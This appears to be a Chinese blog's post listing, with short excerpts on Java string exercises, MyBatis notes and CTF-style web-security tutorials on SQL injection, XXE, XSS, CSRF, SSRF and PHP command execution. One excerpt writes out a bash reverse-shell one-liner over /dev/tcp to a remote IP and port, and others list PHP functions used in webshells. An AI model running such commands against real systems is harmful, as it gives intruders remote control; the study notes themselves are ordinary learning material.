- 博客(61)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 mybatis中的生成器(构建者模式)
https://www.yuque.com/docs/share/d92576d9-04e4-44dc-8891-547578922773?# 《生成器模式(构建者模式)》
2021-03-29 21:35:13
495
原创 Mybatis中MetaClass的作用
https://www.yuque.com/docs/share/ad73f6fc-4080-4b3d-922e-8cecd0ddd62e?# 《Mybatis中MetaClass》
2021-03-29 17:01:31
363
原创 window下多jdk环境及IDEA多JDK设置
https://www.yuque.com/docs/share/685a4ce9-f42c-49fa-8d10-e117588c6fcb?# 《多个jdk环境》
2021-03-22 19:36:02
279
原创 模拟去除首尾空格
//去除首尾空格 public String trim(String s){ int st = 0; int len = s.length(); while ((st<len) && (s.charAt(st)<=' ')){//从前向后获取第一个不是空格的字符位置st st++; } while ((st<len) && (s.charA...
2021-03-08 17:19:17
123
原创 字符串中字符排序
//字符串排序 //思路:字符串转换为字符数组,使用Arrays工具类进行排序,将字符数组转换为字符串 public String paixu(String s){ char[] charArray = s.toCharArray(); Arrays.sort(charArray); return new String(charArray); }...
2021-03-08 17:16:52
186
原创 判断一个子字符串在一个字符串中出现的次数
//判断一个子字符串在一个字符串中出现的次数 //思路:利用indexOf循环 public int count(String s,String sub){ int c = 0; for (int i = s.indexOf(sub,0);i != -1;i=s.indexOf(sub,i+sub.length())){ c++; } return c; }...
2021-03-08 17:14:18
770
原创 字符串字符去重
//字符串去重 //思路:创建一个新数组,遍历子符数组,放入新数组,每次检查是否重复,重复不放,不重复放入 public String quChong(String s){ char[] chars = s.toCharArray(); char[] newChars = new char[chars.length]; for (int i = 0,j = 0; i < chars.length; i++) { ...
2021-03-08 17:11:41
548
原创 Java获取两个字符中相同的最大子串
//获取两个字符中相同的最大子串 //思路:将短的字符串依次减少与长的字符串进行查找indexOf //可能有多个满足的条件的子字符串,所以返回String数组 public List<String> getBigString(String s1,String s2){ //str1 = "abcwerthelloyuiodef“;str2 = "cvhellobnm" List<String> resList = ne...
2021-03-08 16:28:49
203
原创 Java字符串获取所有子串(长度从小到大)并去重
//获取一个字符串的所有子串(长度由大到小)并去重 //使用subString方法 // "cvhellobnm" // cvhellobnm 0 subString(0,s.length()-0+0) // cvhellobn、vhellobnm 1 subString(0,s.length()-1+0) sub(1,s.length()-1+1) // cvhellob、hellobnm、.
2021-03-08 16:24:47
1746
原创 Java字符串反转
//字符串反转 //思路:将字符串转换为字符数组,再把字符数组转换为包装类数组,再把包装类数组转换为集合,利用集合方法反转字符串,再转为数组 public String reverse(String s){ char[] chars = s.toCharArray(); Character[] characters = new Character[s.length()]; for (int i = 0; i < chars.len...
2021-03-08 12:03:40
178
转载 简单理解SQL约束攻击
SQL约束攻击真正利用起来,存在以下的约束条件。服务端没有对用户名长度进行限制。如果服务端限制了用户名长度就不能导致数据库截断,也就没有利用条件。 登陆验证的SQL语句必须是用户名和密码一起验证。如果是验证流程是先根据用户名查找出对应的密码,然后再比对密码的话,那么也不能进行利用。因为当使用 Dumb为用户名来查询密码的话,数据库此时就会返回两条记录,而一般取第一条则是目标用户的记录,那么...
2019-04-05 00:44:30
349
2
原创 php代码审计命令执行漏洞
命令执行漏洞,用户通过浏览器在远程服务器上执行任意系统命令,严格意义上,与代码执行漏洞还是有一定的区别。常用命令执行函数exec()、system()、popen()、passthru()、proc_open()、pcntl_exec()、shell_exec() 、反引号` 实际上是使用shell_exec()函数system() 输出并返回最后一行shell结果。exec()...
2019-04-05 00:44:23
801
1
原创 南邮 sql注入2
<?phpif($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); mysql_select_db(SAE_MYSQL_DB); $user = $_POST[user]; ...
2019-04-05 00:44:17
732
1
原创 php代码执行
PHP中可以执行代码的函数,常用于编写一句话木马,可能导致代码执行漏洞常见代码执行函数如eval()、assert()、preg_replace()、create_function()array_map()、call_user_func()、call_user_func_array(),array_filter,usort,uasort()文件操作函数、动态函数($a($b))...
2019-04-05 00:44:05
733
转载 CSRF漏洞原理利用与防御
转自:http://www.cnblogs.com/hyddd/一.CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。二.CSRF可以做什么? 你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。...
2019-04-05 00:43:56
1285
原创 第一次php代码审计
1.源代码 <?phprequire_once('flag.php');error_reporting(0);if(!isset($_GET['msg'])){ highlight_file(__FILE__); die();}@$msg = $_GET['msg'];if(@file_get_contents($msg)!=="Hello Chal...
2019-04-05 00:43:48
915
原创 xxe漏洞原理与防御
xml基础知识要了解xxe漏洞,那么一定得先明白基础知识,了解xml文档的基础组成。另外php版本大于5.4.45的默认不解析外部实体XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素为什么使用 DTD?通过 DTD,您的每一个 X...
2019-04-05 00:43:26
15360
1
原创 xss漏洞简述
1.xss漏洞简介XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比 如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phishing)攻击而变得广为人知。对于跨站脚本攻击,黑客界共识是:跨...
2019-04-05 00:43:14
2361
原创 文件解析漏洞
1.搭建平台2.命名规则IIS,Apache,Nginx存在解析漏洞ISS6.0文件正常文件地址:xxx:jpg触发解析文件地址:xxx.asp;.xxx.jpg(xx是随机字符;asp是解析格式,也就是可以为jsp,php的解析格式)文件夹正常文件夹地址:xxx/xxx.jpg触发解析文件夹地址:xxx.asp/xxx.jpg(xxx是随机字符;asp为解析格...
2019-04-05 00:43:03
338
原创 php parse_str()
一.pase_str()函数介绍实例把查询字符串解析到变量中:<?php parse_str("name=Bill&age=60"); echo $name."<br>"; echo $age; ?>运行实例定义和用法parse_str() 函数把查询字符串解析到变量中。注释:如果未设置 array 参数,则由该函数设置的变量将...
2019-04-05 00:42:55
752
转载 UpdateXml()mysql 报错注入
UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。第三个参数:new_value,String格式,替换查找到的符合条件的数据作...
2019-04-05 00:42:44
805
原创 百度杯 "2017春秋欢乐赛 攻击"
打开题目网址,代码就被高亮出来<?phpheader("content-type:text/html;charset=utf-8");show_source(__FILE__);echo '<pre>';include('u/ip.php');include('flag.php');if (in_array($_SERVER['REMOTE_ADDR'],$ip...
2019-04-05 00:42:36
1021
原创 ssrf
SSRF形成的原因是服务端提供了从其他服务器应用获取数据的功能,在用户可控的情况下,未对目标地址进行过滤与限制,导致此漏洞的产生。利用函数file_get_concents();fopen()和fpassthru();curl_exec();fsocksopen();1.php<?php$a=$_GET['a'];echo file_get_contents($a);?&...
2019-04-05 00:42:17
261
原创 反弹shell
反弹shell语句bash -i >& /dev/tcp/ip/port 0>&1这句的意思是 首先将标准输出重定向/dev/tcp/ip/port也就是远程 然后再把标准输入重定向远程。然后就可以在远程输入输出了其中ip必须为公网Ipbash -i 在本地产生一个交互的bash环境>&的含义当>&后面接文...
2019-04-05 00:42:08
347
原创 php函数漏洞
1.intval()intval — 获取变量的整数值说明int intval ( mixed $var [, int $base = 10 ] )通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。参数var要转换成 integer 的...
2019-04-05 00:42:00
1781
原创 PHP类
1.PHP自定义类 类中的成员属性如果没有特殊关键字修饰 就必须加上var关键字,而在其他地方不需要这样做2.PHP类中的构造方法无法进行重载 构造方法不要设置成私有的权限也就是说在php类中只能声明一个构造方法,不过可以通过默认参数,使php类中的构造方法实现与其他面向对象语言的构造方法重载功能3.php类中的析构方法不能有任何参数,通常在对象的引用被赋予其他值或者页面...
2019-04-05 00:41:48
460
转载 内网ip
内网IP是以下面几个段开头的IP.用户可以自己设置.常用的内网IP地址:10.x.x.x172.16.x.x至172.31.x.x192.168.x.x 查看内网IP地址。 内 网的计算机以NAT(网络地址转换)协议,通过一个公共的网关访问Internet。内网的计算机可向Internet上的其他计算机发送连接请求,但 Internet上其他的计算机无法向内网的计算机发送连接请求...
2019-04-05 00:41:34
369
原创 xxe
1.如何甄别可能存在xxe最直接的回答就是: 甄别那些接受XML作为输入内容的端点。 但是有时候,这些端点可能并不是那么明显(比如,一些仅使用JSON去访问服务的客户端)。在这种情况下,渗透测试人员就必须尝试不同的测试方式,比如修改HTTP的请求方法,修改Content-Type头部字段等等方法,然后看看应用程序的响应,看看程序是否解析了发送的内容,如果解析了,那么则可能有XXE攻击漏洞。...
2019-04-05 00:41:25
407
原创 c语言课设_通讯录源码
#include<stdio.h> #include<stdlib.h> #include<string.h>typedef struct chsystem { char name[15]; //姓名 char tel[20]; //手机 char post[10]; ...
2018-11-09 20:38:49
1107
4
原创 Java内部类与匿名类
interface Aa{ void say();}class XueHao implements Aa{ public void say(){ System.out.println("hello world"); }}public class Test{ public static void main(String args[]){ Aa aa; aa=new Xu...
2018-11-09 20:38:08
102
转载 php.ini中的include_path配置
一直对include_path的作用不了解,也没怎么注意过它的用途,今天在网上看一些资料后明白了,记录一下: 其实设置include_path的作用就是设置用include()函数包函文件时的路径,当然也可以不设置include_path,只要在包函文件时写出具体的文件相对或绝对路即可:下面以安装smarty为例:下面内容中,我们都是假设你的文件放在了D:\Appserv\w...
2018-11-04 10:16:05
775
原创 php in_array(),substr(),file_put_concents(),PHP_EOL,count()
<?phpheader("content-type:text/html;charset=utf-8");show_source(__FILE__);echo '<pre>';include('u/ip.php');include('flag.php');if (in_array($_SERVER['REMOTE_ADDR'],$ip)){ die("您的ip已进...
2018-11-04 09:58:32
507
转载 PHP数组的创建
一.php数组创建有两种方法这是第一种办法,是最常见的办法$arr = array(...);第二种办法,由于PHP是动态语言,所以可以不用new就能创建数组$arr[] = 10;$arr[]= 12;输出的时候回出现arr[0] = 10,arr[1]=12;,原因是第一句代码的作用是检查数组创建了没有,没有的话就创建,并将赋值10添加到当前最大的索引处上,即赋予到索引0的...
2018-11-03 20:20:29
280
转载 PHP_EOL常量
换行符unix系列用 \nwindows系列用 \r\nmac用 \rPHP中可以用PHP_EOL来替代,以提高代码的源代码级可移植性将文件中的内容合成一行$str = str_replace(PHP_EOL, '', $str);类似常用的还有DIRECTORY_SEPARATOR可以用函数get_defined_constants()来获取所有PHP常量...
2018-11-03 19:24:32
181
转载 linux下解决bash: syntax error near unexpected token `(' 的错误
运行带有小括号'()'的命令如下rm -f index.php(1)却得到下面的一句话:bash: syntax error near unexpected token `('然后我谷歌了一下,发现linux5.0之后,是不能带有括号的,这个时候就需要转译了。转译的方法有下面两种:rm -f index.php"(1)"rm -f index.php\(1\)原文...
2018-11-03 17:36:10
4755
原创 linux中单引号‘ ,双引号“, 反引号 ` `, $, $(), ${}与变量
前言-----我也是半吊子用什么学什么,没有系统地或者专门地学习过linux命令及bash脚本,一切动力都是来自web安全正文1.linux中的变量变量是一个很重要的概念,无论是bash脚本还是其他语言,都是如此。在bash中,创建变量很简单,给变量一个名称即可。默认情况下,变量的值为空。我们可以通过等号为变量赋值。需要注意的是,变量和变量的值不是一个概念。当给定变量一个名称后,例...
2018-11-03 17:25:58
22183
7
原创 php global与$GLOBALS
1.php 变量介绍PHP 中 变量分三类:局部变量、全局变量、超全局变量1.在函数内部声明的变量,就是局部变量,当函数执行完毕,局部变量就消失了。局部变量,只能在函数内部使用。2.在函数外部声明的变量,就是全局变量。在 PHP 中,全局变量,在函数中不能使用,网页执行完毕,全局变量消失。3.系统定义的变量,就是超全局变量。该变量可以在任何地方直接使用。 超全局变量 ...
2018-11-02 21:48:18
722
原创 php strstr()
一.strstr()函数介绍查找 "Shanghai" 在 "I love Shanghai!" 中的第一次出现,并返回字符串的剩余部分:<?php echo strstr("I love Shanghai!","Shanghai"); ?>运行实例定义和用法strstr() 函数搜索字符串在另一字符串中的第一次出现。注释:该函数是二进制安全的。语法...
2018-11-02 19:02:01
1168
1
原创 python_1
#!/usr/bin/env python# -*- coding: utf-8 -*-# @Time : 2018/10/29 18:08# @Author : 薛豪# @File : rot13.pyimport stringresult=[]upperCase=string.ascii_uppercaselowerCase=string.ascii_lower...
2018-10-29 21:47:30
150
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人